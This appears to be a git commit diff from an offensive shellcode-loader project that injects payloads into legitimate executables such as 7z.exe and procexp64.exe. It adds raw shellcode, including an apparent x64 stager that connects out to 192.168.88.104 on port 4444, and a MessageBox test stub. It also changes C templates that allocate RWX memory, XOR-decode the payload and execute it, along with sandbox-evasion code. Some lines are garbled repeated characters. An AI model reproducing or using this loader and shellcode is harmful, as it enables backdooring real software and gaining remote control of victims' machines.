refactor: new data/ structure

2026-06-02 17:27:10 +00:00 · 2024-03-27 20:13:14 +00:00
parent f08334dc1a
commit 4064cf94ba
33 changed files with 151 additions and 52 deletions
@@ -17,4 +17,5 @@ doc/
 *.pickle
 logs/
 app/projects/*
-data/dev/*
+data/dev/*
+data_orig/
@@ -7,4 +7,5 @@ path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\r

 path_sgn: 'C:\tools\sgn2.1\sgn.exe'

-avred_server: "192.168.1.1:8001"
+#avred_server: "http://192.168.88.65:8001"
+avred_server: ""
@@ -0,0 +1,25 @@
+\xeb\x27\x5b\x53\x5f\xb0\xa8\xfc\xae\x75\xfd\x57\x59\x53
+\x5e\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f
+\xb5\x35\x74\x07\x80\x3e\xa8\x75\xea\xeb\xe6\xff\xe1\xe8
+\xd4\xff\xff\xff\x07\xa8\xfb\x4f\x84\xe3\xf7\xef\xc7\x07
+\x07\x07\x46\x56\x46\x57\x55\x56\x51\x4f\x36\xd5\x62\x4f
+\x8c\x55\x67\x4f\x8c\x55\x1f\x4f\x8c\x55\x27\x4f\x8c\x75
+\x57\x4f\x08\xb0\x4d\x4d\x4a\x36\xce\x4f\x36\xc7\xab\x3b
+\x66\x7b\x05\x2b\x27\x46\xc6\xce\x0a\x46\x06\xc6\xe5\xea
+\x55\x46\x56\x4f\x8c\x55\x27\x8c\x45\x3b\x4f\x06\xd7\x8c
+\x87\x8f\x07\x07\x07\x4f\x82\xc7\x73\x60\x4f\x06\xd7\x57
+\x8c\x4f\x1f\x43\x8c\x47\x27\x4e\x06\xd7\xe4\x51\x4f\xf8
+\xce\x46\x8c\x33\x8f\x4f\x06\xd1\x4a\x36\xce\x4f\x36\xc7
+\xab\x46\xc6\xce\x0a\x46\x06\xc6\x3f\xe7\x72\xf6\x4b\x04
+\x4b\x23\x0f\x42\x3e\xd6\x72\xdf\x5f\x43\x8c\x47\x23\x4e
+\x06\xd7\x61\x46\x8c\x0b\x4f\x43\x8c\x47\x1b\x4e\x06\xd7
+\x46\x8c\x03\x8f\x4f\x06\xd7\x46\x5f\x46\x5f\x59\x5e\x5d
+\x46\x5f\x46\x5e\x46\x5d\x4f\x84\xeb\x27\x46\x55\xf8\xe7
+\x5f\x46\x5e\x5d\x4f\x8c\x15\xee\x50\xf8\xf8\xf8\x5a\x4f
+\xbd\x06\x07\x07\x07\x07\x07\x07\x07\x4f\x8a\x8a\x06\x06
+\x07\x07\x46\xbd\x36\x8c\x68\x80\xf8\xd2\xbc\xf7\xb2\xa5
+\x51\x46\xbd\xa1\x92\xba\x9a\xf8\xd2\x4f\x84\xc3\x2f\x3b
+\x01\x7b\x0d\x87\xfc\xe7\x72\x02\xbc\x40\x14\x75\x68\x6d
+\x07\x5e\x46\x8e\xdd\xf8\xd2\x64\x6a\x63\x29\x62\x7f\x62
+\x27\x28\x64\x27\x62\x64\x6f\x68\x27\x66\x27\x39\x27\x64
+\x3d\x5b\x73\x62\x6a\x77\x5b\x66\x07\xb5\x35
@@ -0,0 +1,29 @@
+"\x48\x83\xEC\x28\x48\x83\xE4\xF0\x48\x8D\x15\x66\x00\x00\x00"
+"\x48\x8D\x0D\x52\x00\x00\x00\xE8\x9E\x00\x00\x00\x4C\x8B\xF8"
+                        "\x48\x8D\x0D\x5D\x00\x00\x00\xFF\xD0\x48\x8D\x15\x5F\x00\x00"
+                        "\x00\x48\x8D\x0D\x4D\x00\x00\x00\xE8\x7F\x00\x00\x00\x4D\x33"
+                        "\xC9\x4C\x8D\x05\x61\x00\x00\x00\x48\x8D\x15\x4E\x00\x00\x00"
+                        "\x48\x33\xC9\xFF\xD0\x48\x8D\x15\x56\x00\x00\x00\x48\x8D\x0D"
+                        "\x0A\x00\x00\x00\xE8\x56\x00\x00\x00\x48\x33\xC9\xFF\xD0\x4B"
+                        "\x45\x52\x4E\x45\x4C\x33\x32\x2E\x44\x4C\x4C\x00\x4C\x6F\x61"
+                        "\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x55\x53\x45\x52\x33"
+                        "\x32\x2E\x44\x4C\x4C\x00\x4D\x65\x73\x73\x61\x67\x65\x42\x6F"
+                        "\x78\x41\x00\x48\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x00"
+                        "\x4D\x65\x73\x73\x61\x67\x65\x00\x45\x78\x69\x74\x50\x72\x6F"
+                        "\x63\x65\x73\x73\x00\x48\x83\xEC\x28\x65\x4C\x8B\x04\x25\x60"
+                        "\x00\x00\x00\x4D\x8B\x40\x18\x4D\x8D\x60\x10\x4D\x8B\x04\x24"
+                        "\xFC\x49\x8B\x78\x60\x48\x8B\xF1\xAC\x84\xC0\x74\x26\x8A\x27"
+                        "\x80\xFC\x61\x7C\x03\x80\xEC\x20\x3A\xE0\x75\x08\x48\xFF\xC7"
+                        "\x48\xFF\xC7\xEB\xE5\x4D\x8B\x00\x4D\x3B\xC4\x75\xD6\x48\x33"
+                        "\xC0\xE9\xA7\x00\x00\x00\x49\x8B\x58\x30\x44\x8B\x4B\x3C\x4C"
+                        "\x03\xCB\x49\x81\xC1\x88\x00\x00\x00\x45\x8B\x29\x4D\x85\xED"
+                        "\x75\x08\x48\x33\xC0\xE9\x85\x00\x00\x00\x4E\x8D\x04\x2B\x45"
+                        "\x8B\x71\x04\x4D\x03\xF5\x41\x8B\x48\x18\x45\x8B\x50\x20\x4C"
+                        "\x03\xD3\xFF\xC9\x4D\x8D\x0C\x8A\x41\x8B\x39\x48\x03\xFB\x48"
+                        "\x8B\xF2\xA6\x75\x08\x8A\x06\x84\xC0\x74\x09\xEB\xF5\xE2\xE6"
+                        "\x48\x33\xC0\xEB\x4E\x45\x8B\x48\x24\x4C\x03\xCB\x66\x41\x8B"
+                        "\x0C\x49\x45\x8B\x48\x1C\x4C\x03\xCB\x41\x8B\x04\x89\x49\x3B"
+                        "\xC5\x7C\x2F\x49\x3B\xC6\x73\x2A\x48\x8D\x34\x18\x48\x8D\x7C"
+                        "\x24\x30\x4C\x8B\xE7\xA4\x80\x3E\x2E\x75\xFA\xA4\xC7\x07\x44"
+                        "\x4C\x4C\x00\x49\x8B\xCC\x41\xFF\xD7\x49\x8B\xCC\x48\x8B\xD6"
+                        "\xE9\x14\xFF\xFF\xFF\x48\x03\xC3\x48\x83\xC4\x28\xC3";
@@ -0,0 +1,33 @@
+\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50
+\x52\x48\x31\xd2\x51\x56\x65\x48\x8b\x52\x60\x48\x8b\x52
+\x18\x48\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48
+\x8b\x72\x50\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41
+\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x48\x8b\x52\x20\x41
+\x51\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x0f
+\x85\x72\x00\x00\x00\x8b\x80\x88\x00\x00\x00\x48\x85\xc0
+\x74\x67\x48\x01\xd0\x44\x8b\x40\x20\x8b\x48\x18\x49\x01
+\xd0\x50\xe3\x56\x4d\x31\xc9\x48\xff\xc9\x41\x8b\x34\x88
+\x48\x01\xd6\x48\x31\xc0\x41\xc1\xc9\x0d\xac\x41\x01\xc1
+\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8
+\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44
+\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41
+\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83
+\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9
+\x4b\xff\xff\xff\x5d\x49\xbe\x77\x73\x32\x5f\x33\x32\x00
+\x00\x41\x56\x49\x89\xe6\x48\x81\xec\xa0\x01\x00\x00\x49
+\x89\xe5\x49\xbc\x02\x00\x11\x5c\xc0\xa8\x58\x68\x41\x54
+\x49\x89\xe4\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5
+\x4c\x89\xea\x68\x01\x01\x00\x00\x59\x41\xba\x29\x80\x6b
+\x00\xff\xd5\x6a\x0a\x41\x5e\x50\x50\x4d\x31\xc9\x4d\x31
+\xc0\x48\xff\xc0\x48\x89\xc2\x48\xff\xc0\x48\x89\xc1\x41
+\xba\xea\x0f\xdf\xe0\xff\xd5\x48\x89\xc7\x6a\x10\x41\x58
+\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99\xa5\x74\x61\xff\xd5
+\x85\xc0\x74\x0c\x49\xff\xce\x75\xe5\x68\xf0\xb5\xa2\x56
+\xff\xd5\x48\x83\xec\x10\x48\x89\xe2\x4d\x31\xc9\x6a\x04
+\x41\x58\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff\xd5\x48
+\x83\xc4\x20\x5e\x89\xf6\x6a\x40\x41\x59\x68\x00\x10\x00
+\x00\x41\x58\x48\x89\xf2\x48\x31\xc9\x41\xba\x58\xa4\x53
+\xe5\xff\xd5\x48\x89\xc3\x49\x89\xc7\x4d\x31\xc9\x49\x89
+\xf0\x48\x89\xda\x48\x89\xf9\x41\xba\x02\xd9\xc8\x5f\xff
+\xd5\x48\x01\xc3\x48\x29\xc6\x48\x85\xf6\x75\xe1\x41\xff
+\xe7
@@ -1 +0,0 @@
-瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞
@@ -1 +0,0 @@
-    char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40);
@@ -1 +0,0 @@
-    (*(void(*)())(dest))();
@@ -1,3 +1,4 @@
+    // Single byte XOR key
    for (int n=0; n<{{PAYLOAD_LEN}}; n++){
        dest[n] = supermega_payload[n];
        dest[n] = dest[n] ^ {{XOR_KEY}};
@@ -0,0 +1,5 @@
+        // Multibyte XOR (untested)
+        // Need: key, key_len
+        for ( int i = 0; i < {{PAYLOAD_LEN}}; i++ ) {
+            dest[i] = supermega_payload[i] ^ key[i % key_len];
+        }
@@ -21,7 +21,7 @@ int sleep_ms(DWORD sleeptime) {

 int main()
 {
-	sleep_ms(10000);
+	//sleep_ms(10000);

 	// Execution Guardrail: Env Check
 	//wchar_t envVarName[] = {'U','S','E','R','P','R','O','F','I','L','E', 0};
@@ -37,18 +37,18 @@ int main()
 		return 6;
 	}

-	// Allocate RWX segment
+	// Allocate 1
    // char *dest = ...
-{{ plugin_allocator }}
+    char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40);

-	// Copy
+	// Copy (and decode)
 	// from: supermega_payload[]
 	// to:   dest[]
-    // len:  0x11223344
 {{ plugin_decoder }}

+
    // Execute *dest
-{{ plugin_executor }}
+    (*(void(*)())(dest))();

 	return 0;
 }
@@ -93,7 +93,7 @@ int main()
 {{ plugin_decoder }}

    // Execute *dest
-{{ plugin_executor }}
+    (*(void(*)())(dest))();

 	return 0;
 }
@@ -7,6 +7,13 @@ class FilePath(str):
 # with data/shellcodes/createfile.bin
 VerifyFilename: FilePath = r'C:\Temp\a'

+PATH_EXES = "data/binary/exes/"
+PATH_SHELLCODES = "data/binary/shellcodes/"
+PATH_PEB_WALK = "data/source/carrier/peb_walk/"
+PATH_IAT_REUSE = "data/source/carrier/iat_reuse/"
+PATH_PAYLOAD = "data/source/payload/"
+PATH_DECODER = "data/source/carrier/decoder/"
+
 # Correlated with real template files
 # in data/plugins/

@@ -31,14 +31,14 @@ def create_c_from_template(

    logger.info("--[ Create C from template")

-    filepath = "data/plugins/allocator/{}.c".format(alloc_style.value)
-    with open(filepath, "r", encoding='utf-8') as file:
-        plugin_allocator = file.read()
-        plugin_allocator = Template(plugin_allocator).render({
-            'PAYLOAD_LEN': payload_len,
-        })
+    #filepath = "data/plugins/allocator/{}.c".format(alloc_style.value)
+    #with open(filepath, "r", encoding='utf-8') as file:
+    #    plugin_allocator = file.read()
+    #    plugin_allocator = Template(plugin_allocator).render({
+    #        'PAYLOAD_LEN': payload_len,
+    #    })

-    filepath = "data/plugins/decoder/{}.c".format(decoder_style.value)
+    filepath = PATH_DECODER + "{}.c".format(decoder_style.value)
    with open(filepath, "r", encoding='utf-8') as file:
        plugin_decoder = file.read()
        plugin_decoder = Template(plugin_decoder).render({
@@ -46,16 +46,16 @@ def create_c_from_template(
            'XOR_KEY': config.xor_key,
        })

-    filepath = "data/plugins/executor/{}.c".format(exec_style.value)
-    with open("data/plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
-        plugin_executor = file.read()
-        plugin_executor = Template(plugin_executor).render({
-            'PAYLOAD_LEN': payload_len,
-        })
+    #filepath = "data/plugins/executor/{}.c".format(exec_style.value)
+    #with open("data/plugins/executor/direct_1.c", "r", encoding='utf-8') as file:
+    #    plugin_executor = file.read()
+    #    plugin_executor = Template(plugin_executor).render({
+    #        'PAYLOAD_LEN': payload_len,
+    #    })
    
    if source_style == SourceStyle.peb_walk:
        if use_templates:
-            with open("data/source/peb_walk/template.c", 'r', encoding='utf-8') as file:
+            with open(PATH_PEB_WALK + "template.c", 'r', encoding='utf-8') as file:
                template_content = file.read()
                observer.add_text("main_c_template", template_content)

@@ -71,16 +71,16 @@ def create_c_from_template(
                observer.add_text("main_c_rendered", rendered_template)

            # TODO PEB
-            shutil.copy("data/source/peb_walk/peb_lookup.h", f"{build_dir}/peb_lookup.h")
+            shutil.copy(PATH_PEB_WALK + "peb_lookup.h", f"{build_dir}/peb_lookup.h")
        else:
-            observer.add_text("main_c", file_readall_text("data/source/peb_walk/main.c"))
-            shutil.copy("data/source/peb_walk/main.c", main_c_file)
+            observer.add_text("main_c", file_readall_text(PATH_PEB_WALK + "main.c"))
+            shutil.copy(PATH_PEB_WALK + "main.c", main_c_file)
            # TODO PEB
-            shutil.copy("data/source/peb_walk/peb_lookup.h", f"{build_dir}/peb_lookup.h")
+            shutil.copy(PATH_PEB_WALK + "peb_lookup.h", f"{build_dir}/peb_lookup.h")

    elif source_style == SourceStyle.iat_reuse:
        if use_templates:
-            with open("data/source/iat_reuse/template.c", 'r', encoding='utf-8') as file:
+            with open(PATH_IAT_REUSE + "template.c", 'r', encoding='utf-8') as file:
                template_content = file.read()
                observer.add_text("main_c_template", template_content)
            template = Template(template_content)
@@ -94,5 +94,5 @@ def create_c_from_template(
                file.write(rendered_template)
                observer.add_text("main_c_rendered", rendered_template)
        else:
-            observer.add_text("main_c", file_readall_text("data/source/iat_reuse/main.c"))
-            shutil.copy("data/source/iat_reuse/main.c", main_c_file)
+            observer.add_text("main_c", file_readall_text(PATH_IAT_REUSE + "main.c"))
+            shutil.copy(PATH_IAT_REUSE + "main.c", main_c_file)
@@ -30,9 +30,9 @@ def main():
    parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode')
    parser.add_argument('--inject', type=str, help='The path to the file where we will inject ourselves in')
    parser.add_argument('--sourcestyle', type=str, help='peb_walk or iat_reuse')
-    parser.add_argument('--alloc', type=str, help='Template: which allocator plugin')
+    #parser.add_argument('--alloc', type=str, help='Template: which allocator plugin')
    parser.add_argument('--decoder', type=str, help='Template: which decoder plugin')
-    parser.add_argument('--exec', type=str, help='Template: which exec plugin')
+    #parser.add_argument('--exec', type=str, help='Template: which exec plugin')
    parser.add_argument('--rbrunmode', type=str, help='Redbackdoorer run argument (1 EAP, 2 hijack)')
    parser.add_argument('--start-injected', action='store_true', help='Dev: Start the generated infected executable at the end')
    parser.add_argument('--start-loader-shellcode', action='store_true', help='Dev: Start the loader shellcode (without payload)')
@@ -58,17 +58,17 @@ def main():
            settings.source_style = SourceStyle.peb_walk
        elif args.sourcestyle == "iat_reuse":
            settings.source_style = SourceStyle.iat_reuse
-    if args.alloc:
-        if args.alloc == "rwx_1":
-            settings.alloc_style = AllocStyle.RWX
+    #if args.alloc:
+    #    if args.alloc == "rwx_1":
+    #        settings.alloc_style = AllocStyle.RWX
    if args.decoder:
        if args.decoder == "plain_1":
            settings.decoder_style = DecoderStyle.PLAIN_1
        elif args.decoder == "xor_1":
            settings.decoder_style = DecoderStyle.XOR_1
-    if args.exec:
-        if args.exec == "direct_1":
-            settings.exec_style = ExecStyle.CALL
+    #if args.exec:
+    #    if args.exec == "direct_1":
+    #        settings.exec_style = ExecStyle.CALL
    if args.inject:
        if args.rbrunmode == "eop":
            settings.inject_mode = InjectStyle.ChangeEntryPoint
@@ -2,6 +2,7 @@ from typing import Dict

 from helper import *
 from config import config
+from model.defs import *

 from model.settings import Settings
 from log import setup_logging
@@ -9,20 +10,19 @@ from supermega import start


 def main():
-    """Argument parsing for when called from command line"""
-    logger.info("Super Mega")
+    logger.info("Super Mega Tester")
    config.load()

    settings = Settings()
-    settings.payload_path = "data/shellcodes/createfile.bin"
+    settings.payload_path =  PATH_SHELLCODES + "createfile.bin"
    settings.verify = True
    settings.try_start_final_infected_exe = False
    
    # 7z, peb-walk, change-entrypoint
    settings.source_style = SourceStyle.peb_walk
    settings.inject_mode = InjectStyle.ChangeEntryPoint
-    settings.inject_exe_in = "data/exes/7z.exe"
-    settings.inject_exe_out = "data/exes/7z-verify.exe"
+    settings.inject_exe_in = PATH_EXES + "7z.exe"
+    settings.inject_exe_out = PATH_EXES + "7z-verify.exe"
    if start(settings) != 0:
        print("Error")
        return 1
@@ -30,8 +30,8 @@ def main():
    # 7z, peb-walk, hijack
    settings.source_style = SourceStyle.peb_walk
    settings.inject_mode = InjectStyle.BackdoorCallInstr
-    settings.inject_exe_in = "data/exes/7z.exe"
-    settings.inject_exe_out = "data/exes/7z-verify.exe"
+    settings.inject_exe_in = PATH_EXES + "7z.exe"
+    settings.inject_exe_out = PATH_EXES + "7z-verify.exe"
    if start(settings) != 0:
        print("Error")
        return 1
@@ -39,8 +39,8 @@ def main():
    # procexp, iat-reuse, change-entrypoint
    settings.source_style = SourceStyle.iat_reuse
    settings.inject_mode = InjectStyle.ChangeEntryPoint
-    settings.inject_exe_in = "data/exes/procexp64.exe"
-    settings.inject_exe_out = "data/exes/procexp64-verify.exe"
+    settings.inject_exe_in = PATH_EXES + "procexp64.exe"
+    settings.inject_exe_out = PATH_EXES + "procexp64-verify.exe"
    if start(settings) != 0:
        print("Error")
        return 1
@@ -48,8 +48,8 @@ def main():
    # procexp, iat-reuse, change-entrypoint
    settings.source_style = SourceStyle.iat_reuse
    settings.inject_mode = InjectStyle.ChangeEntryPoint
-    settings.inject_exe_in = "data/exes/procexp64.exe"
-    settings.inject_exe_out = "data/exes/procexp64-verify.exe"
+    settings.inject_exe_in = PATH_EXES + "procexp64.exe"
+    settings.inject_exe_out = PATH_EXES + "procexp64-verify.exe"
    if start(settings) != 0:
        print("Error")
        return 1
				`@@ -1 +0,0 @@`
				`瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞瑞`
				`@@ -1 +0,0 @@`
				`char *dest = VirtualAlloc(NULL, {{PAYLOAD_LEN}}, 0x3000, 0x40);`